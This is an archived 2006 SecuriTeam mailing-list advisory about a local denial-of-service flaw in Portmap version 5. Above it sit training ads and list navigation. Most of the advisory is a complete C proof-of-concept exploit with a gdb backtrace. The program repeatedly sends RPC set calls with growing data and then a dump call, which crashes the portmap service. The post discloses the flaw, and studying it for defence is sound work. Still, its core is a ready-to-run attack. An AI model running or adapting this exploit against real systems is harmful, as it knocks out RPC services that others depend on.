Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[EXPL] Portmap Local DoS (Set + Dump)

from [SecuriTeam] Network Security [Permanent Link]
Subject: [EXPL] Portmap Local DoS (Set + Dump)
Date: 24 May 2006 13:57:11 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Portmap Local DoS (Set + Dump)
------------------------------------------------------------------------


SUMMARY

Portmap is a server that converts RPC program numbers into DARPA protocol 
port numbers.  It must be running in order to make RPC calls.

Portmap is vulnerable to Denial of Service attacks commited from 
localhost.

DETAILS

Vulnerable Systems:
 * Portmap version 5.

Exploit:
/////////////////////////////////////
// portmap Set+Dump Local DoS - PoC
////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
////////////////////////////////////

// Tested on Linux with version 5

// USE DEBUGGING MODE
/////////////////////

// (gdb) backtrace
// #0  0xffffe410 in __kernel_vsyscall ()
// #1  0xb7f21343 in write () from /lib/tls/libc.so.6
// #2  0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6
// #3  0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6
// #4  0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6
// #5  0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6
// #6  0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6
// #7  0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6
// #8  0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6
// #9  0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6
// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6
// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6
// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6
// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6
// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at 
portmap.c:515
// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6
// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6
// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6
// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at 
portmap.c:303

#include <stdio.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/pmap_prot.h>

int i;
int len=600;
char    myhost[256];

main(int argc, char *argv[]) {

  if (argc < 2) {
   printf("usage:%s <hostname>\n",argv[0]);
   exit(1);
  }

  if (argc >2) { len=atoi(argv[2]);  }
  if (len > 1024) { len=1024; }

  unsigned long PROGRAM=100000;
  unsigned long VERSION=2;

  struct hostent *hp;
  struct sockaddr_in server_addr;
  int sock = RPC_ANYSOCK;
  register CLIENT *client;
  enum clnt_stat clnt_stat;
  struct timeval timeout;
  timeout.tv_sec = 40;
  timeout.tv_usec = 0;


  if ((hp = gethostbyname(argv[1])) == NULL) {
    printf("Can't resolve %s\n",argv[1]);
    exit(0);
  }

  gethostname(myhost,255);
  bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length);
  server_addr.sin_family = AF_INET;
  server_addr.sin_port =  0;

  if ((client = 
clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) {
    clnt_pcreateerror("clnttcp_create");
    exit(0);
  }

  client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL);

  char *data = (char *) malloc(1024);
  memset(data,0x0,strlen(data));

  char *response = (char *) malloc(1024);
  memset(response,0x0,strlen(response));

  for (i = 0 ; i < len ; i++) {
    memcpy(data+strlen(data),"1",1);
    clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) 
&data,(xdrproc_t) xdr_wrapstring,(char *)  response,timeout);
  }

  clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) 
&data,(xdrproc_t) xdr_wrapstring,(char *)  response,timeout);

  clnt_destroy(client);
  close(sock);
  free(data);
  free(response);
  exit(0);
}


ADDITIONAL INFORMATION

The original article can be found at:
 <http://www.milw0rm.com/exploits/1815> 
http://www.milw0rm.com/exploits/1815



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Portmap Local DoS (Set + Dump), SecuriTeam <=
Previous by Date:  [UNIX] Prodder Arbitrary Command Execution, SecuriTeam
Next by Date:  [TOOL] PBNJ - Running Nmap Scans with Parsing/Diff'ing, SecuriTeam
Previous by Thread:  [UNIX] Prodder Arbitrary Command Execution, SecuriTeam
Next by Thread:  [TOOL] PBNJ - Running Nmap Scans with Parsing/Diff'ing, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]